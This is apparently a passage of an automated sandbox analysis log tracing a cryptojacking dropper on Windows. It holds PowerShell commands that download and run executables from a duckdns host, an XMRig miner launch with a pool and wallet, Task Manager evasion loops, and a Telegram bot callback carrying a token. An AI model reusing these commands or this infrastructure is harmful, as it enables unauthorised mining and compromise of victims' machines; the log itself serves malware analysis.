WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\conhost.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\cmd.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\find.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: unknown |
Process created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Users\user\AppData\Roaming\6.exe "C:\Users\user\AppData\Roaming\6.exe" |
|
Source: C:\Users\user\AppData\Roaming\6.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs" |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" " |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Users\user\AppData\Roaming\6.exe "C:\Users\user\AppData\Roaming\6.exe" |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs" |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" " |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
